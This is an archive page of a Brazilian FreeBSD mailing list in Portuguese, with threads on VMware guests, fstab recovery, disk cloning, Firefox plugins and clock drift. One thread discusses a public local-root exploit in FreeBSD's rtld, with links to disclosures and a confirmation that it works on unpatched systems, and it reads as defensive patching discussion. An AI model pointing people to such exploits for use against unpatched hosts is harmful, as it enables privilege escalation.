 recurso, mas para economia de espaço em disco, não é pra
 quem precisa de 

Grande Nilson... quanto ao desempenho eu sei que teria alguma perda 
(tenho outras vm's rodando VMWARE SERVER)... mas um QUADCORE ficar 
parecendo um P200 é demais não? rsrs =)

Vou esperar terminar a compilação do open-vm-tools (tive que cancelar, 
instalei com suporta a x11, e não uso x11), e vou incluir o hz=100 e 
rebootar... espero melhoras no desempenho.

Quanto ao disco, ele já ALOCOU o espaço (250GB), não uso flat.

Obrigado pelas dicas!

-- 
Welkson Renny de Medeiros
Desenvolvimento / Gerência de Redes
Focus Automação Comercial
FreeBSD Community Member

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Welkson Renny de Medeiros
Welkson Renny de Medeiros escreveu:
 Nilson escreveu:
   
 Não vá achar que vai ficar a mesma coisa que
 rodando diretamente na máquina física né? Mas CPU em
 geral fica muito bom (principalmente se o HOST suportar
 a virtualização por hardware).
 Os gargalos normalmente são memória RAM, e principalmente
 o disco, o que se intensifica se você usar o flat vmdk, aquele
 que vai se expandindo conforme você vai usando. É um ótimo
 recurso, mas para economia de espaço em disco, não é pra
 quem precisa de 
 

Errei em uma configuração no fstab e dancei legal:
http://intranet.focusautomacao.com.br/publico/bsd.PNG

=(

Tentando logar em single-mode para remover a linha do fstab... mas não 
estou conseguindo...

Fiz a alteração no loader.conf, aí fui testar algo no fstab, e fiz m

-- 
Welkson Renny de Medeiros
Desenvolvimento / Gerência de Redes
Focus Automação Comercial
FreeBSD Community Member

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


[FUG-BR] Cópia a quente do HD

2009-12-01 Por tôpico Edinilson - ATINET
Caros amigos, alguém conhece algum software onde eu consiga fazer uma imagem 
a quente do HD do freebsd e recuperar, depois, em outro HD ?
Alguma coisa do tipo Acronis True Image para Windows ( 
http://www.acronis.com/ )

Pergunto pois, preciso passar um HD IDE para HD SATA e está dificil arrumar 
um tempo para parar o servidor e fazer um ghost.

Obrigado

Edinilson
-
ATINET-Professional Web Hosting
Tel Voz: (0xx11) 4412-0876
http://www.atinet.com.br

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Nenhum_de_Nos
On Tue, 01 Dec 2009 14:35:58 -0300
Welkson Renny de Medeiros welk...@focusautomacao.com.br wrote:

 Welkson Renny de Medeiros escreveu:
  Nilson escreveu:

  Não vá achar que vai ficar a mesma coisa que
  rodando diretamente na máquina física né? Mas CPU em
  geral fica muito bom (principalmente se o HOST suportar
  a virtualização por hardware).
  Os gargalos normalmente são memória RAM, e principalmente
  o disco, o que se intensifica se você usar o flat vmdk, aquele
  que vai se expandindo conforme você vai usando. É um ótimo
  recurso, mas para economia de espaço em disco, não é pra
  quem precisa de 
  
 
 Errei em uma configuração no fstab e dancei legal:
 http://intranet.focusautomacao.com.br/publico/bsd.PNG
 
 =(
 
 Tentando logar em single-mode para remover a linha do fstab... mas não 
 estou conseguindo...
 
 Fiz a alteração no loader.conf, aí fui testar algo no fstab, e fiz m

não estou acompanhando a conversa aqui, mas o erro é de entrada de fstab certo ?

tenta ? naquela tela. depois de achar qual disco tem o bsd manda 
ufs:/dev/quemfor e deveria funcionar ...

se era outra coisa e eu viajei longe, foi mal =]

matheus

-- 
We will call you Cygnus,
The God of balance you shall be

A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?

http://en.wikipedia.org/wiki/Posting_style
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] Cópia a quente do HD

2009-12-01 Por tôpico Jorge Petry
Acho que vc consegue fazer isso da melhor forma usando as ferramentas
nativas do FreeBSD dump e restore.

No histórico da lista explica certinho.

Qualquer coisa reporta ai.

Abraço.



Jorge Petry.
ADM de Redes.
(48) 8401-4436.


Edinilson - ATINET escreveu:
 Caros amigos, alguém conhece algum software onde eu consiga fazer uma imagem 
 a quente do HD do freebsd e recuperar, depois, em outro HD ?
 Alguma coisa do tipo Acronis True Image para Windows ( 
 http://www.acronis.com/ )
 
 Pergunto pois, preciso passar um HD IDE para HD SATA e está dificil arrumar 
 um tempo para parar o servidor e fazer um ghost.
 
 Obrigado
 
 Edinilson
 -
 ATINET-Professional Web Hosting
 Tel Voz: (0xx11) 4412-0876
 http://www.atinet.com.br
 
 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
 
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Welkson Renny de Medeiros
Nenhum_de_Nos escreveu:
 não estou acompanhando a conversa aqui, mas o erro é de entrada de fstab 
 certo ?

 tenta ? naquela tela. depois de achar qual disco tem o bsd manda 
 ufs:/dev/quemfor e deveria funcionar ...

 se era outra coisa e eu viajei longe, foi mal =]

 matheu

Eu tentei o ?, depois fiz  a montagem, mas ele reclama do mesmo 
jeito... estou agora apelando para o cd de instalação (fix-it ou tentar 
algum outro acesso shell)

Já tinha feito um bocado de coisa, perder tudo é fogo...

-- 
Welkson Renny de Medeiros
Desenvolvimento / Gerência de Redes
Focus Automação Comercial
FreeBSD Community Member

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Danilo Egea
Welkson Renny de Medeiros wrote:
 Welkson Renny de Medeiros escreveu:
   
 Nilson escreveu:
   
 
 Não vá achar que vai ficar a mesma coisa que
 rodando diretamente na máquina física né? Mas CPU em
 geral fica muito bom (principalmente se o HOST suportar
 a virtualização por hardware).
 Os gargalos normalmente são memória RAM, e principalmente
 o disco, o que se intensifica se você usar o flat vmdk, aquele
 que vai se expandindo conforme você vai usando. É um ótimo
 recurso, mas para economia de espaço em disco, não é pra
 quem precisa de 
 
   

 Errei em uma configuração no fstab e dancei legal:
 http://intranet.focusautomacao.com.br/publico/bsd.PNG

 =(

 Tentando logar em single-mode para remover a linha do fstab... mas não 
 estou conseguindo...

 Fiz a alteração no loader.conf, aí fui testar algo no fstab, e fiz m

   
Entra modo sigle, e naquela tela de pau digita: ufs:/dev/discos1a 
(como no proprio exemplo da tela) que ele vai montar e entrar, depois vc 
monta o resto e arruma o fstab.

-- 
Danilo Egêa Gondolfo
Email/MSN - daniloe...@yahoo.com.br
Skype - daniloegea
Twitter - http://twitter.com/daniloegea
Blog - http://daniloegea.wordpress.com

__
Faça ligações para outros computadores com o novo Yahoo! Messenger 
http://br.beta.messenger.yahoo.com/ 

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Welkson Renny de Medeiros
Danilo Egea escreveu:
 Entra modo sigle, e naquela tela de pau digita: ufs:/dev/discos1a
 (como no proprio exemplo da tela) que ele vai montar e entrar, depois vc 
 monta o resto e arruma o fstab

Já tive situações parecidas em máquinas comuns, foi tranquilo acessar em 
single user, fazer acertos em arquivos de configuração, etc... mas em 
máquinas virtualizadas tá complicado... ele não encontra o ponto de 
montagem... quando informo o ? não aparece nada.

Vou formatar e instalar de novo... é bom que treino =)

-- 
Welkson Renny de Medeiros
Desenvolvimento / Gerência de Redes
Focus Automação Comercial
FreeBSD Community Member

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] Cópia a quente do HD

2009-12-01 Por tôpico Fernando Ferreira da Silva
eu faço com dd



2009/12/1 Jorge Petry jo...@bsd.com.br

 Acho que vc consegue fazer isso da melhor forma usando as ferramentas
 nativas do FreeBSD dump e restore.

 No histórico da lista explica certinho.

 Qualquer coisa reporta ai.

 Abraço.


 
 Jorge Petry.
 ADM de Redes.
 (48) 8401-4436.


 Edinilson - ATINET escreveu:
  Caros amigos, alguém conhece algum software onde eu consiga fazer uma
 imagem
  a quente do HD do freebsd e recuperar, depois, em outro HD ?
  Alguma coisa do tipo Acronis True Image para Windows (
  http://www.acronis.com/ )
 
  Pergunto pois, preciso passar um HD IDE para HD SATA e está dificil
 arrumar
  um tempo para parar o servidor e fazer um ghost.
 
  Obrigado
 
  Edinilson
  -
  ATINET-Professional Web Hosting
  Tel Voz: (0xx11) 4412-0876
  http://www.atinet.com.br
 
  -
  Histórico: http://www.fug.com.br/historico/html/freebsd/
  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
 
 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD 8.0-RELEASE

2009-12-01 Por tôpico Joao Rocha Braga Filho
2009/12/1 Joao Rocha Braga Filho goffr...@gmail.com:
 2009/12/1 Nenhum_de_Nos math...@eternamente.info:
 On Mon, 30 Nov 2009 23:27:34 -0300
 Antônio Pessoa antoniopes...@bsd.com.br wrote:

 http://seclists.org/fulldisclosure/2009/Nov/371

 Alguém já leu ou testou? Ainda não tive tempo de instalar/atualizar o
 RELEASE para testar. Mas pelo que li o 7.1 e o 7.2 também são
 vulneráveis.

 acabei de testar em um 8.0R recém instalado (sem patches nem nada, primeiro 
 boot) e funciona.

 Eu vi o fonte do FreeBSD 8.0, com cvsup logo depois do release, e está
 como o patch que diz que tem que sair. Estou fazendo um csup no meu
 sistema que nem tinha instalado ainda, mas já tinha compilado.

Um cvsup ao amanhecer mostrou veio com o patch aplicado.


João Rocha.



 João Rocha.


 matheus

 --
 We will call you Cygnus,
 The God of balance you shall be

 A: Because it messes up the order in which people normally read text.
 Q: Why is top-posting such a bad thing?

 http://en.wikipedia.org/wiki/Posting_style
 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd




 --
 Sempre se apanha mais com as menores besteiras. Experiência própria.

 goffr...@gmail.com




-- 
Sempre se apanha mais com as menores besteiras. Experiência própria.

goffr...@gmail.com
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Nenhum_de_Nos

On Tue, December 1, 2009 16:28, Welkson Renny de Medeiros wrote:
 Danilo Egea escreveu:
 Entra modo sigle, e naquela tela de pau digita: ufs:/dev/discos1a
 (como no proprio exemplo da tela) que ele vai montar e entrar, depois vc
 monta o resto e arruma o fstab

 Já tive situações parecidas em máquinas comuns, foi tranquilo acessar em
 single user, fazer acertos em arquivos de configuração, etc... mas em
 máquinas virtualizadas tá complicado... ele não encontra o ponto de
 montagem... quando informo o ? não aparece nada.

se não aparece nada acho que o problema é outro.

eu sou meio receioso com virtualização por isso. tirar o hd e levar para
outra máquina é sempre possível quando na vera ...

podes tentar isso e não perder tudo ... já tentou ?

matheus

 Vou formatar e instalar de novo... é bom que treino =)

 --
 Welkson Renny de Medeiros
 Desenvolvimento / Gerência de Redes
 Focus Automação Comercial
 FreeBSD Community Member

 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd



-- 
We will call you cygnus,
The God of balance you shall be

A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?

http://en.wikipedia.org/wiki/Posting_style
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD 8.0-RELEASE

2009-12-01 Por tôpico Nenhum_de_Nos

On Tue, December 1, 2009 17:51, Joao Rocha Braga Filho wrote:
 2009/12/1 Joao Rocha Braga Filho goffr...@gmail.com:
 2009/12/1 Nenhum_de_Nos math...@eternamente.info:
 On Mon, 30 Nov 2009 23:27:34 -0300
 Antônio Pessoa antoniopes...@bsd.com.br wrote:

 http://seclists.org/fulldisclosure/2009/Nov/371

 Alguém já leu ou testou? Ainda não tive tempo de instalar/atualizar o
 RELEASE para testar. Mas pelo que li o 7.1 e o 7.2 também são
 vulneráveis.

 acabei de testar em um 8.0R recém instalado (sem patches nem nada,
 primeiro boot) e funciona.

 Eu vi o fonte do FreeBSD 8.0, com cvsup logo depois do release, e está
 como o patch que diz que tem que sair. Estou fazendo um csup no meu
 sistema que nem tinha instalado ainda, mas já tinha compilado.

 Um cvsup ao amanhecer mostrou veio com o patch aplicado.

STABLE ? ou RELENG_8_0 ?

se for releng terei que recompilar ..

matheus

-- 
We will call you cygnus,
The God of balance you shall be

A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?

http://en.wikipedia.org/wiki/Posting_style
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


[FUG-BR] Plugin do Java no Firefox

2009-12-01 Por tôpico Pablo Sánchez
Caros,

Acho que é de interesse de todos ter os plugins devidamente
configurados no firefox, e como ainda (tempo é algo que é inversamente
proporcional à necessidade e às prioridades, quando mais importante é
algo, parece que menos tempo você tem, o que consomo todo o tempo para
o restante, impressionante) não terminei de escrever aquele artigo
sobre FreeBSD 8 para usuários desktop, segue só um adianto sobre como
ter o java no firefox. É o item 9 no artigo. Ainda não tive tempo de
ver se vai com o flash, mas a tentativa anterior ainda não tinha dado
certo, por isso nem tentei de novo.

9 - Firefox 3.5 com plugins de flash e java

Tudo é feito a partir do ports mesmo, então, vamos lá.

# cd /usr/ports/www/firefox35
# make install

Agora o java

# cd /usr/ports/java/diablo-jdk16 (pode ser o jre, mas eu precisava do jdk)
# make install

Alguns pacotes terão que ser baixados na mão mesmo, por isso, siga as
instruções passadas e coloque os pacotes baixados manualmente no
/usr/ports/distfiles. Um detalhe: eu deixei todas as opções
desmarcadas para não ter que corrigir o port manualmente.

Ao final, para que o plugin seja localizado, será necessário que o
link simbólico para ele seja colocado manualmente. Isso porque o
nspluginwrapper não está funcionando corretamente. Ele cria o link
simbólico em um local no qual o firefox não está localizando o plugin.

# ln -s /usr/local/lib/browser_plugins/libjavaplugin_oji.so
/usr/local/lib/firefox3/plugins/

E pronto!

-- 
=
Pablo Santiago Sánchez
Análise e Desenvolvimento de Sistemas Web
Zend Certified Engineer #ZEND006757
phack...@gmail.com
(61) 9975-0883
http://www.sansis.com.br
http://www.corephp.com.br
Quidquid latine dictum sit, altum viditur
=
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Nilson
2009/12/1 Welkson Renny de Medeiros welk...@focusautomacao.com.br:
 [cut...]
 Grande Nilson... quanto ao desempenho eu sei que teria alguma perda
 (tenho outras vm's rodando VMWARE SERVER)... mas um QUADCORE ficar
 parecendo um P200 é demais não? rsrs =)
 [cut...]

Sem chance né? Diria que em termos de CPU vc perde apenas
alguns %. Chutaria de 3% a 20% dependendo do modo de
tradução das instruções.

Mas enfim, funciona muito bem a virtualização do FreeBSD
em VMware, vá postando suas experiências que vamos te
ajudar a deixá-lo redondo.

-- 
[]s
Nilson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] ESXi4 + FreeBSD8 (x64) = como instalar o VMware Guest Tools?

2009-12-01 Por tôpico Nilson
2009/12/1 Nenhum_de_Nos math...@eternamente.info:
 On Tue, December 1, 2009 16:28, Welkson Renny de Medeiros wrote:
 Danilo Egea escreveu:
 Entra modo sigle, e naquela tela de pau digita: ufs:/dev/discos1a
 (como no proprio exemplo da tela) que ele vai montar e entrar, depois vc
 monta o resto e arruma o fstab

 Já tive situações parecidas em máquinas comuns, foi tranquilo acessar em
 single user, fazer acertos em arquivos de configuração, etc... mas em
 máquinas virtualizadas tá complicado... ele não encontra o ponto de
 montagem... quando informo o ? não aparece nada.

 se não aparece nada acho que o problema é outro.

 eu sou meio receioso com virtualização por isso. tirar o hd e levar para
 outra máquina é sempre possível quando na vera ...

 podes tentar isso e não perder tudo ... já tentou ?

 matheus

Parece gritante nossa diferença de visão sobre o assunto,
pois onde você vê uma desvantagem ou dificuldade extra
nas máquinas virtuais eu vejo uma gigantesca vantagem
no quesito praticidade de manipulação.

Por ser um simples arquivo, as vezes inconveniente pelo
seu tamanho, eu tenho a liberdade de copiá-lo pra onde
quiser e testar, mecher, modificar de inúmeras formas,
sem sequer precisar abrir um computador, ou estar
perto dele, tudo remotamente.

Inclusive para testar coisas, quando tiver alguma
dúvida em relação ao resultado do procedimento,
posso fazer um snapshot, testar/zoar/estragar a vontade,
e se por fim não der certo o procedimento, voltar para o
estado inicial, do momento da criação do snap.

Tirar o HD e levar pra outra máquina? Que tal adicionar
um novo HD em outra maquina virtual e apenas
apontar para o VMDK que vc quer mitigar? E ainda
criar um SNAPSHOT antes de mecher nele, se você
detonar com o HD é só voltar.

E se eu quiser testar uma mega-atualizacao de
versao no meu servidor XYZ que está em produção?
Simples: faço uma clonagem da VM (basicamente
é apenas uma copia da pasta) e levanto esse clone
como um ambiente de testes, faço todo o procedimento
de atualização/testo/confiro/refaço até que fique
perfeito, e então posso fazer isso no servidor oficial
de produção, ou então para diminuir o downtime,
simplesmente inverto a VM de produção pela VM de
testes, apenas atualizando os dados que ela manipula.

Enfim, resumindo minha verborragia virtual, quero
dizer que na minha opnião as máquinas virtuais
trazem tantos benefícios a sua administração e
gerenciamento, que sua perda de performance
em relação ao hardware nativo torna-se irrelevante
para a grande maioria dos casos onde pode ser
aplicada. Hoje em dia eu não vejo desvantagem
alguma em utilizar virtualização em ambientes de
T.I. de qualquer empresa que possua pelo menos
uns 3 servidores.
O único caso em que continuo usando preferencialmente
máquina física é no gateway/firewall da rede. Gosto
de ver aquele Pentium2 de 500MHz que todo mundo
chinga e diz que vai jogar no lixo virando um baita
de um router :)



-- 
[]s
Nilson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] Cópia a quente do HD

2009-12-01 Por tôpico Nilson
2009/12/1 Fernando Ferreira da Silva fernando.si...@gmail.com:
 eu faço com dd


Com dd direto você pode acabar tendo muitas inconsistências
e o resultado não servir adequadamente ao objetivo.

Veja se sua versão de FreeBSD suporta snapshots, o que é
muito provável que sim, então crie um snapshot do(s) file(s)
system(s) que queres manipular, atribua um memory disk
de vnode para ele, e ai sim mande brasa num dd para onde
você quiser.

Ou simplesmente, monte esse md em algum lugar da
própria máquina que já poderas trabalhar um monte
em cima dele.

Dê uma olhada na man page do mksnap_ffs, é bem
simples.

-- 
[]s
Nilson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Nilson
Olá pessoal, acabei de atualizar os sources
de uma máquina virtual de testes, via csup com
o servidor cvsup3.br.freebsd.org na tag RELENG_8.

Recompilei o kernel, rebootei, testei o exploit, e...
funcionou!!!

Então ao olhar o patch, descobri uma coisa que não
está óbvio em nenhuma lista, e o pessoal em geral
está preocupado apenas com a versão do kernel,
MAS, repito, MAS o problema não se encontra no
kernel e sim na lib ld-elf.so.1 que é usada pelo
kernel para carregar e executar binários do tipo
elf. A solução mais simples foi entrar no source
desta lib (ja patcheada via csup, /usr/src/libexec/rtld-elf )
e simplesmente recompilá-la com make  make install
 reboot.

Após esse procedimento o exploit se tornou inútil,
e analisando o conteúdo do patch, não há
necessidade de recompilar toda a userland (world)
ou o kernel.

Só me restou a dúvida de se é realmente necessário
rebootar a máquina, se alguém realizar esse
procedimento, poderia testar o exploit entre o
make install e o reboot para ver se ainda funciona?

---
Nilson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


[FUG-BR] OFF - Qmail (mudança de IP)- Ajuda dos profissionais e experientes

2009-12-01 Por tôpico Guilherme Alves
Olá colegas da lista, boa noite
Preciso de uma ajuda dos profissionais e experientes em Qmail.Preciso mudar o 
IP do meu servidor de e-mail (FreeBSD + Qmail) e gostaria de saber se preciso 
alterar alguma configuração no Qmail para isso, ou tudo e somente o que eu 
preciso alterar é nas configurações de rede do SO, dns, etc?Estou só preocupado 
se precisa alterar alguma coisa no Qmail (além é claro de configurar o dns 
reverso corretamente para poder enviar emails :) )
GratoGuilherme Alves.


  

Veja quais são os assuntos do momento no Yahoo! +Buscados
http://br.maisbuscados.yahoo.com
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] Plugin do Java no Firefox

2009-12-01 Por tôpico Renato Botelho
2009/12/1 Pablo Sánchez phack...@gmail.com:
 Caros,

 Acho que é de interesse de todos ter os plugins devidamente
 configurados no firefox, e como ainda (tempo é algo que é inversamente
 proporcional à necessidade e às prioridades, quando mais importante é
 algo, parece que menos tempo você tem, o que consomo todo o tempo para
 o restante, impressionante) não terminei de escrever aquele artigo
 sobre FreeBSD 8 para usuários desktop, segue só um adianto sobre como
 ter o java no firefox. É o item 9 no artigo. Ainda não tive tempo de
 ver se vai com o flash, mas a tentativa anterior ainda não tinha dado
 certo, por isso nem tentei de novo.

 9 - Firefox 3.5 com plugins de flash e java

 Tudo é feito a partir do ports mesmo, então, vamos lá.

 # cd /usr/ports/www/firefox35
 # make install

 Agora o java

 # cd /usr/ports/java/diablo-jdk16 (pode ser o jre, mas eu precisava do jdk)
 # make install

 Alguns pacotes terão que ser baixados na mão mesmo, por isso, siga as
 instruções passadas e coloque os pacotes baixados manualmente no
 /usr/ports/distfiles. Um detalhe: eu deixei todas as opções
 desmarcadas para não ter que corrigir o port manualmente.

 Ao final, para que o plugin seja localizado, será necessário que o
 link simbólico para ele seja colocado manualmente. Isso porque o
 nspluginwrapper não está funcionando corretamente. Ele cria o link
 simbólico em um local no qual o firefox não está localizando o plugin.

 # ln -s /usr/local/lib/browser_plugins/libjavaplugin_oji.so
 /usr/local/lib/firefox3/plugins/

Se não quiser que o link seja removido a cada atualização do firefox,
basta criar o link dentro de ~/.mozilla/plugins

-- 
Renato Botelho
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Nilson
2009/12/1 Nilson nil...@forge.com.br:
 [cut...]
 Só me restou a dúvida de se é realmente necessário
 rebootar a máquina, se alguém realizar esse
 procedimento, poderia testar o exploit entre o
 make install e o reboot para ver se ainda funciona?

Testado: Não há necessidade de reboot, basta instalar
a nova ld-elf.so.1

-- 
Nilson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD local r00t zeroday

2009-12-01 Por tôpico Celso Viana
2009/12/1 Renato Botelho rbga...@gmail.com:
 2009/12/1 Matheus L. Abreu matheusl.ab...@gmail.com:
 O Danilo Egea fez um lab e a coisa funciona mesmo.
 =\

 A falha é conhecida, a solução já foi commitada no -CURRENT,
 8-STABLE e 7-STABLE.

 O security advisory deve sair amanhã e então as correções para
 as versões -RELEASE

 --
 Renato Botelho
 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/67203

-- 
Celso Vianna
BSD User: 51318
http://www.bsdcounter.org

63 8404-8559
Palmas/TO
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] Estranho comportamento do ping

2009-12-01 Por tôpico tg_melo
 É normal o relogio atrasar sim (adiantar é incomum), por isso
 acho saudável agendar no cron um ntpdate 1x por dia, e sim
 estou disposto a te ajudar pois já sofri muito e estudei a fundo
 problemas de relógio, principalmente nas epocas dos k6 onde
 era comum (pelo menos nos meus) um erro super esquisito que
 era algo mais ou menos assim negative calcru of time -1234, que
 significava que o processo XYZ havia terminado sua execução
 em 1234 usecs antes de haver sido iniciado, altamente paradoxal.
 
 Então, me motivei pois mais ninguém se interessou pelo seu
 problema, e por conhecer a fundo o funcionamento do relogócio
 do PC (desde as epocas dos XT e 286 alterando o ticker do PC
 de 18,2 pra 64 e estragando as unidades de disquete, k)
 e de sua implementação no FreeBSD, a qual na minha opnião
 é a mais avançada e completa existente.
 É tão completa, que se vc conseguir descobrir que o normal do
 seu relógio é atrasar 228 ticks por dia, vc pode atravez de variaveis
 alterar a taxa de ticks para refletir esse atraso.
 
 Mas enfim, aqui não é a lista de CHAT pra ficarmos divagando
 sobre o assunto, então pra concluir, te digo o seguinte, as vezes
 a gente se bate um monte pra resolver via software esse problema,
 e nem sempre a solução é decente, e por incrível que pareça, a
 solução definitiva para esse problema, em várias ocasiões em
 que topei com ele, foi a substitução da pilha (não chamem de
 bateria por favor) da BIOS. Foi difícil de eu acreditar no começo
 que a pilha tivesse alguma relação com o funcionamento do
 relógio quando o computador está ligado, mas infelizmente os
 designs das placas mães baratas (leia-se essas que usamos
 nos desktops) são assim mesmo.
 
 Se esse computador é um servidor em produção que rode algo
 de média importância, sugiro esse teste simples: troque a pilha
 dele com a pilha de algum desktop novo (pra evitar a chance de
 usar outra pilha fraca) ai da empresa, e se der certo reporte o
 resultado para a lista.
 
 --
 Nilson

fala, Nilson.
apenas adiantando. 
fiz a substituição da pilha, mas como estava sem multímetro em mãos, não tive 
como testar a q foi utilizada no processo (seria uma pilha mais nova, nunca se 
sabe...).
realmente apoio sua indicação, e pretendo assegura-la o mais breve possível, 
tendo certeza da carga.
(meu p133 gateway/downloader/proxy pessoal, q o diga, está suplicando por pilha 
nova)
ainda assim a perda de pacotes em intervalos de horário não específicos (2 a 4 
vezes diárias), permaneceu.
como disse, não chega necessariamente a interferir no funcionamento geral. mas 
está lá.
ainda suspeito do restante do hardware tb. pq?
parafraseando vc mesmo, ... principalmente nas epocas dos k6 
adivinha só.
é o q sempre digo, o desarmador reconhece a bomba só com a descrição. :D
18,2 pra 64. isso q é um verdadeiro overclock de interrupções. old school :)
no mais, logo q me certificar da carga da pilha já posto os resultados.
[]'s



Gabriel
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] FreeBSD 8.0-RELEASE

2009-12-01 Por tôpico Joao Rocha Braga Filho
2009/12/1 Nenhum_de_Nos math...@eternamente.info:

 On Tue, December 1, 2009 17:51, Joao Rocha Braga Filho wrote:
 2009/12/1 Joao Rocha Braga Filho goffr...@gmail.com:
 2009/12/1 Nenhum_de_Nos math...@eternamente.info:
 On Mon, 30 Nov 2009 23:27:34 -0300
 Antônio Pessoa antoniopes...@bsd.com.br wrote:

 http://seclists.org/fulldisclosure/2009/Nov/371

 Alguém já leu ou testou? Ainda não tive tempo de instalar/atualizar o
 RELEASE para testar. Mas pelo que li o 7.1 e o 7.2 também são
 vulneráveis.

 acabei de testar em um 8.0R recém instalado (sem patches nem nada,
 primeiro boot) e funciona.

 Eu vi o fonte do FreeBSD 8.0, com cvsup logo depois do release, e está
 como o patch que diz que tem que sair. Estou fazendo um csup no meu
 sistema que nem tinha instalado ainda, mas já tinha compilado.

 Um cvsup ao amanhecer mostrou veio com o patch aplicado.

 STABLE ? ou RELENG_8_0 ?

Verifiquei no meu arquivo de configurações, e é RELENG_8.


João Rocha.

 se for releng terei que recompilar ..

 matheus

 --
 We will call you cygnus,
 The God of balance you shall be

 A: Because it messes up the order in which people normally read text.
 Q: Why is top-posting such a bad thing?

 http://en.wikipedia.org/wiki/Posting_style
 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd




-- 
Sempre se apanha mais com as menores besteiras. Experiência própria.

goffr...@gmail.com
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd